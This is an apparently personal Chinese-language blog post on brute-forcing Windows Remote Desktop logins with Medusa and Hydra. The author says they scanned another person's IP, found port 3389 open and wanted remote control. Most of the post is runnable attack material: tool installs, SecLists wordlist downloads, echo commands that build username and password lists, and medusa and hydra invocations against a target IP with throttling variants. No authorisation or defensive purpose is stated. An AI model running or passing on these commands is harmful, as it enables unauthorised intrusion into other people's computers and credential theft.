什么是美杜莎medusa

美杜莎好像data游戏里面有一个游戏人物的名字叫这个

但是我是程序员,当然不是说的游戏里面的角色了

这个medusa是一个暴力破解的工具

主要是因为我扫码到别人的ip和端口号了

他的端口号是3389

就是Windows的远程连接端口

如果知道用户名和密码就能远程控制这台电脑了

于是我搜索了一下

就有这个medusa很好用

其中还有一个被我弃用了

Linux如何安装medusa

我是centos,虽然都是Linux但是版本有所区别

sudo yum install medusa

如何安装git

yum install -y git

如何下载github上的字典

git clone https://github.com/danielmiessler/SecLists.git

国内字典下载

git clone https://gitee.com/mirrors/SecLists.git

常用密码字典

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt (opens new window)

常用的用户名字典

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt (opens new window)

感觉有用的git仓库

https://github.com/danielmiessler/SecLists (opens new window)

使用技巧

创建usernames文件和passwords文件

先cd到tmp文件夹

cd tmp

echo -e "administrator\nadmin\nroot\nguest\nuser\ntest\nmanager\nsystem\noperator\nsupervisor\ntechnician\nhelp\nsupport\nservice\nbackup\nowner\nstaff\noffice\nreception\ninfo\nadministration\naccounting\nhr\nfinance\nit\nsecurity" > usernames.txt

echo -e '123456\n12345678\nqwerty\npassword\nadmin123\nroot123\nP@ssw0rd\nAdmin@123\nPassword123\nQwerty123\nAbc123456\n123456789\ntest123\nwelcome\nWelcome123\nAdmin2024\nPass@word1\nSystem123\nQwerty@123\n1q2w3e4r\nRoot@123\n1234qwer\nP@ssword123\nAdmin1234\nPassword@123\nQwerty123!\n123qweASD\nAdmin!@#123\nRoot!@#456\nP@ssw0rd123\nTest@123\nWelcome@2024\nAbc@123456\nSystem@123\nManager123\nSupport123\n!QAZ2wsx\nZaq12wsx\nXsw2@1234\nPassword1!\nAdmin2024@\nRoot2024#\nQwerty!@#123' > passwords.txt

medusa -h 目标IP -U ./usernames.txt -P ./passwords.txt -M rdp

medusa -h 目标IP -U ./usernames.txt -P ./passwords.txt -M rdp

替代方案

yum install -y hydra

hydra -L ./usernames.txt -P ./passwords.txt rdp://目标IP

# 使用更保守的参数设置

hydra -L ./usernames.txt -P ./passwords.txt -t 4 -W 3 rdp://目标IP

# 或者使用更保守的设置

hydra -L ./usernames.txt -P ./passwords.txt -t 1 -W 1 rdp://目标IP

错误

Weird bug detected where more tests were performed than possible. Please post your command line here: https://github.com/vanhauser-thc/thc-hydra/issues/113 or send it in an email to vh@thc.org

# 或者分批次测试用户名

hydra -L ./usernames.txt -p Password123 -t 1 -W 1 rdp://目标IP

# 或者分批次测试用户名

hydra -L ./usernames.txt -p Password123 -t 1 -W 1 rdp://192.168.1.11

hydra -l AUSU -P ./passwords.txt -t 1 -W 1 rdp://192.168.1.11